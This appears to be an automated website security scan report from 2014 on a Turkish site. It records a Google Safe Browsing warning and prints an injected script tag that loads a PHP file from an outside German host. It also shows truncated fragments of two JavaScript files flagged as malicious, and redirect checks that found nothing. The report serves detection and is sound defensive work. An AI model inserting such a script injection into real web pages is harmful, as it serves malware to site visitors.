Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=ervagiyim.com.tr
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://ervagiyim.com.tr/ | 200 OK Content-Length: 2106 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://jobboerse.markt-wartenberg.de/F8kGt3NL.php?id=16185815"></script> | ||
http://ervagiyim.com.tr/swfobject/swfobject.js | 200 OK Content-Length: 15092 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var swfobject=function(){var D="undefined",r="object",S="Shockwave Flash",W="ShockwaveFlash.ShockwaveFlash",q="application/x-shockwave-flash",R="SWFObjectExprInst",x="onreadystatechange",O=window,j=document,t=navigator,T=false,U=[h],o=[],N=[],I=[],l,Q,E,B,J=false,a=false,n,G,m=true,M=function(){var aa=typeof j.getElementById!=D&&typeof j.getElementsByTagName!=D&&typeof j.createElement!=D,ah=t.userAgent.toLowerCase(),Y=t.platform.toLowerCase(),ae=Y?/win/.test(Y):/win/.test(ah),ac= Antivirus reports:
| ||
http://ervagiyim.com.tr/swfaddress/swfaddress.js | 200 OK Content-Length: 20777 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) if(typeof asual=="undefined"){var asual={}}if(typeof asual.util=="undefined"){asual.util={}}asual.util.Browser=new function(){var b=navigator.userAgent.toLowerCase(),a=/webkit/.test(b),e=/opera/.test(b),c=/msie/.test(b)&&!/opera/.test(b),d=/mozilla/.test(b)&&!/(compatible|webkit)/.test(b),f=parseFloat(c?b.substr(b.indexOf("msie") 4):(b.match(/. (?:rv|it|ra|ie)[\/: ]([\d.] )/)||[0,"0"])[1]);this.toString=function(){return"[class Browser]"};this.getVersion=function(){return f};this Antivirus reports:
| ||
http://ervagiyim.com.tr/test404page.js | 404 Not Found Content-Length: 959 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: ervagiyim.com.tr
Result:
HTTP/1.1 200 OK
Connection: close
Date: Wed, 08 Oct 2014 06:12:45 GMT
Accept-Ranges: bytes
ETag: "2ca35b-83a-4f3b47a28ce00"
Server: Apache
Vary: Accept-Encoding
Content-Length: 2106
Content-Type: text/html
Last-Modified: Mon, 03 Mar 2014 14:19:36 GMT
...2106 bytes of data.
GET / HTTP/1.1
Host: ervagiyim.com.tr
Result:
HTTP/1.1 200 OK
Connection: close
Date: Wed, 08 Oct 2014 06:12:45 GMT
Accept-Ranges: bytes
ETag: "2ca35b-83a-4f3b47a28ce00"
Server: Apache
Vary: Accept-Encoding
Content-Length: 2106
Content-Type: text/html
Last-Modified: Mon, 03 Mar 2014 14:19:36 GMT
...2106 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: ervagiyim.com.tr
Referer: http://www.google.com/search?q=ervagiyim.com.tr
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: ervagiyim.com.tr
Referer: http://www.google.com/search?q=ervagiyim.com.tr
Result:
The result is similar to the first query. There are no suspicious redirects found.